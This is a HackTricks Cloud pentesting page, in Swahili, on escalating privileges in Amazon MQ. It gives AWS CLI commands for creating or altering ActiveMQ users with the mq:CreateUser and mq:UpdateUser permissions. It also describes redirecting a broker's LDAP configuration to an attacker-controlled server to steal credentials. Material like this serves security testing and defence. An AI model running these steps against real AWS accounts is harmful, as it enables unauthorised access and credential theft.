Swahili - Ht Cloud
HackTricks TrainingTwitterLinkedinSponsor

AWS - MQ Privesc

Support HackTricks

MQ

Kwa maelezo zaidi kuhusu MQ angalia:

mq:ListBrokers, mq:CreateUser

Kwa ruhusa hizo unaweza kuunda mtumiaji mpya katika broker ya ActimeMQ (hii haifanyi kazi katika RabbitMQ):

aws mq list-brokers
aws mq create-user --broker-id <value> --console-access --password <value> --username <value>

Madhara Yanayoweza Kutokea: Upatikanaji wa taarifa nyeti kupitia ActiveMQ

mq:ListBrokers, mq:ListUsers, mq:UpdateUser

Kwa ruhusa hizo unaweza kuunda mtumiaji mpya katika broker ya ActimeMQ (hii haifanyi kazi katika RabbitMQ):

aws mq list-brokers
aws mq list-users --broker-id <value>
aws mq update-user --broker-id <value> --console-access --password <value> --username <value>

Madhara Yanayoweza Kutokea: Upatikanaji wa taarifa nyeti kupitia ActiveMQ

mq:ListBrokers, mq:UpdateBroker

Ikiwa broker inatumia LDAP kwa ajili ya idhini na ActiveMQ. Inawezekana kubadilisha mipangilio ya seva ya LDAP inayotumika kuwa moja inayodhibitiwa na mshambuliaji. Kwa njia hii mshambuliaji ataweza kuiba akidi zote zinazotumwa kupitia LDAP.

aws mq list-brokers
aws mq update-broker --broker-id <value> --ldap-server-metadata=...

Ikiwa unaweza kwa namna fulani kupata akauti za awali zilizotumika na ActiveMQ unaweza kufanya MitM, kuiba akauti, kuzitumia kwenye seva ya awali, na kutuma jibu (labda kwa kurudia tu akauti zilizibwa unaweza kufanya hivi).

Athari Zinazoweza Kutokea: Iba akauti za ActiveMQ

Support HackTricks
PreviousAWS - Mediapackage PrivescNextAWS - MSK Privesc

Last updated